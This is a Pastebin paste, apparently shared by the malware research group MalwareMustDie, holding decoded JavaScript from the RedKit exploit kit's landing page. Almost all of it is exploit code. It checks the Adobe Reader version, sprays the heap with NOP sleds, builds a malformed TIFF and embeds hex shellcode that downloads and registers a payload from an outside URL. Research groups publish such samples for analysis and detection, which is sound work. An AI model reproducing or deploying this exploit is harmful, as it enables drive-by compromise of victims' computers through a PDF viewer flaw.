API tools faq
paste
Advertisement
MalwareMustDie

RedKit - Landing page script 20120112-3

MalwareMustDie
Jan 11th, 2013
1,940
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.59 KB | None | 0 0
raw download clone embed print report
  1. //decode...get the eval() <-- just run it as per it is..
  2.  
  3. Midias = unescape(gerpsoi.replace(/CHoedsp/g, dsprpa.charAt(1)));
  4.  
  5. // written values:
  6.  
  7. /*dbgbgfgd dswd*/var doogo = 'ikgoweewepowehjw[hhwehweh';
  8. var j_IgC = [31, 31, 15, 23];
  9. function _k_m(){
  10.   return app;
  11. }
  12. function _b_(xVgFqV){
  13.   var ___N = '';
  14.   ___N = unescape(xVgFqV);
  15.   return ___N;
  16. }
  17. function get_ver(){
  18.   var ver = _k_m().viewerVersion.toString();
  19.   ver = ver.replace('.', '');
  20.   while (ver.length < 4){
  21.     ver += '0';
  22.   }
  23.   ver = parseInt(ver, 10);
  24.   return ver;
  25. }
  26. function make_block(xVgFqV, len){
  27.   while (xVgFqV.length * 2 < len){
  28.     xVgFqV += xVgFqV;
  29.   }
  30.   xVgFqV = xVgFqV.substring(0, len / 2);
  31.   return xVgFqV;
  32. }
  33. function heap_spray3(scode){
  34.   scode = _b_(scode);
  35.   var sclen = scode.length * 2;
  36.   var fxcvxx = _b_('%u9090');
  37.   var spray = make_block(fxcvxx, 0x2000 - sclen);
  38.   var block = scode + spray;
  39.   block = make_block(block, 0x80000 - 0x40);
  40.   for (var i = 0; i < 0x190; i ++ ){
  41.     j_IgC[i] = block.substr(0, block.length - 1) + fxcvxx;
  42.   }
  43.   return ;
  44. }
  45. function make_str(xVgFqV, len){
  46.   while (xVgFqV.length < len){
  47.     xVgFqV += xVgFqV;
  48.   }
  49.   xVgFqV = xVgFqV.substring(0, len);
  50.   return xVgFqV;
  51. }
  52. function num2hex(num){
  53.   var xVgFqV = num.toString(16);
  54.   var len = xVgFqV.length;
  55.   var ret = (len % 2) ? '0' + xVgFqV : xVgFqV;
  56.   return ret;
  57. }
  58. function str2uni(xVgFqV){
  59.   var ret = '';
  60.   for (var i = 0; i < xVgFqV.length; i += 2){
  61.     ret += '%u';
  62.     ret += num2hex(xVgFqV.charCodeAt(i + 1));
  63.     ret += num2hex(xVgFqV.charCodeAt(i));
  64.   }
  65.   return ret;
  66. }
  67. function hex2str(hex){
  68.   var ret = '';
  69.   for (var i = 0; i < hex.length; i += 2){
  70.     var b = hex.substr(i, 2);
  71.     var num = parseInt(b, 16);
  72.     ret += String.fromCharCode(num);
  73.   }
  74.   return ret;
  75. }
  76. splaui();
  77. function splaui(){
  78.   var ver = get_ver();
  79.   if (ver >= 0x1f40){
  80.     var tiff = 'SUkqADggAABB';
  81.     var nops = make_str('QUFB', 0x2ae8);
  82.     var start = '
  83. QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
  84. EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  85.     var foot = '';
  86.     var sc_hex = '';
  87.     if (ver < 0x2009){
  88.       foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  89.       var sc_hex = '
  90. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
  91. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  92. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  93. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  94. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  95. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  96. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  97. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  98. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  99. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  100. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
  101. 6c0000';
  102.     }
  103.     else {
  104.       foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  105.       sc_hex = '
  106. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  107. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  108. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  109. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  110. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  111. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  112. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  113. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  114. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  115. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  116. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
  117. 6c0000';
  118.     }
  119.     if (foot.length){
  120.       var ret = [tiff, nops, start, foot].join('');
  121.       var sc_str = hex2str(sc_hex);
  122.       var scode = str2uni(sc_str);
  123.       heap_spray3(scode);
  124.       rVBGo.rawValue = ret;
  125.     }
  126.   }
  127. }
  128. #malwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!